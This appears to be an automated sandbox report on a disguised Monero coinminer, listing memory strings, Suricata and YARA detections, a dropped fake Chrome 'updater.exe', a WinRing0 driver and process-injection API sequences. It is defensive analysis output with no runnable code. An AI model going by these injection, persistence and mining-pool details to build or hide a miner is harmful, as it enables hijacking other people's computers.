Source:	Binary string: mbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831* source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct4AB9.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct8ACF.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp
Source:	Binary string: (@C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb*6 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wz.pdB source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A583109edcd source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831~1 source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbF source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wz.pdBk source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831d0 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbl source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A69BE3C FindFirstFileExW,	8_2_000002EA8A69BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338EBE3C FindFirstFileExW,	9_2_000001CB338EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E027CBE3C FindFirstFileExW,	10_2_0000026E027CBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF1BE3C FindFirstFileExW,	11_2_000001C6CEF1BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000025304FBBE3C FindFirstFileExW,	12_2_0000025304FBBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C2116BE3C FindFirstFileExW,	13_2_0000016C2116BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_0000016C211CBE3C FindFirstFileExW,	13_2_0000016C211CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000026F4814BE3C FindFirstFileExW,	14_2_0000026F4814BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B9234BE3C FindFirstFileExW,	15_2_0000029B9234BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_0000029B923ABE3C FindFirstFileExW,	15_2_0000029B923ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AABE3C FindFirstFileExW,	16_2_0000020422AABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_00000206287BBE3C FindFirstFileExW,	17_2_00000206287BBE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 20_2_000002847139BE3C FindFirstFileExW,	20_2_000002847139BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001829254BE3C FindFirstFileExW,	21_2_000001829254BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001BB3DA6BE3C FindFirstFileExW,	24_2_000001BB3DA6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_0000029ABCF4BE3C FindFirstFileExW,	25_2_0000029ABCF4BE3C
Source: C:\Windows\System32\conhost.exe	Code function: 28_2_0000025E81DDBE3C FindFirstFileExW,	28_2_0000025E81DDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000001CD9AD8BE3C FindFirstFileExW,	29_2_000001CD9AD8BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_000002AF8C39BE3C FindFirstFileExW,	31_2_000002AF8C39BE3C

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.11:63517 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.11:49871 -> 142.202.242.43:80

Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertG
Source: lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000006.00000002.1404686932.0000022851D80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mC&
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000002.2639344959.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000009.00000002.2645746107.000001CB33000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348175734.000001CB33000000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.np
Source: powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1403630784.0000022851A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: updater.exe PID: 7012, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Source: C:\Windows\System32\dialer.exe	Code function: 5_2_00007FF67E6C10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	5_2_00007FF67E6C10C0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A692A7C NtEnumerateValueKey,NtEnumerateValueKey,	8_2_000002EA8A692A7C
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338E26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	9_2_000001CB338E26F0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338E21CC NtQuerySystemInformation,StrCmpNIW,	9_2_000001CB338E21CC
Source: C:\Windows\System32\dwm.exe	Code function: 11_2_000001C6CEF12A7C NtEnumerateValueKey,NtEnumerateValueKey,	11_2_000001C6CEF12A7C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AA23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	16_2_0000020422AA23F0
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_0000020422AA21CC NtQuerySystemInformation,StrCmpNIW,	16_2_0000020422AA21CC
Source: C:\Windows\System32\dialer.exe	Code function: 26_2_00007FF6101910C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	26_2_00007FF6101910C0

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Source: C:\Windows\System32\dialer.exe	Code function: 5_2_00007FF67E6C2328	5_2_00007FF67E6C2328
Source: C:\Windows\System32\dialer.exe	Code function: 5_2_00007FF67E6C14E4	5_2_00007FF67E6C14E4
Source: C:\Windows\System32\dialer.exe	Code function: 5_2_00007FF67E6C1DB4	5_2_00007FF67E6C1DB4
Source: C:\Windows\System32\dialer.exe	Code function: 5_2_00007FF67E6C26E8	5_2_00007FF67E6C26E8
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A66B030	8_2_000002EA8A66B030
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6620DC	8_2_000002EA8A6620DC
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A671658	8_2_000002EA8A671658
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A66B23C	8_2_000002EA8A66B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A66F2F8	8_2_000002EA8A66F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A69BC30	8_2_000002EA8A69BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A692CDC	8_2_000002EA8A692CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6A2258	8_2_000002EA8A6A2258
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A69BE3C	8_2_000002EA8A69BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A69FEF8	8_2_000002EA8A69FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6EB030	8_2_000002EA8A6EB030
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6E20DC	8_2_000002EA8A6E20DC
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6F1658	8_2_000002EA8A6F1658
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6EB23C	8_2_000002EA8A6EB23C
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000002EA8A6EF2F8	8_2_000002EA8A6EF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338BB030	9_2_000001CB338BB030
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338BF2F8	9_2_000001CB338BF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338BB23C	9_2_000001CB338BB23C
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338C1658	9_2_000001CB338C1658
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338B20DC	9_2_000001CB338B20DC
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338EBC30	9_2_000001CB338EBC30
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338EFEF8	9_2_000001CB338EFEF8
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338EBE3C	9_2_000001CB338EBE3C
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338F2258	9_2_000001CB338F2258
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_000001CB338E2CDC	9_2_000001CB338E2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E0279F2F8	10_2_0000026E0279F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 10_2_0000026E0279B030	10_2_0000026E0279B030
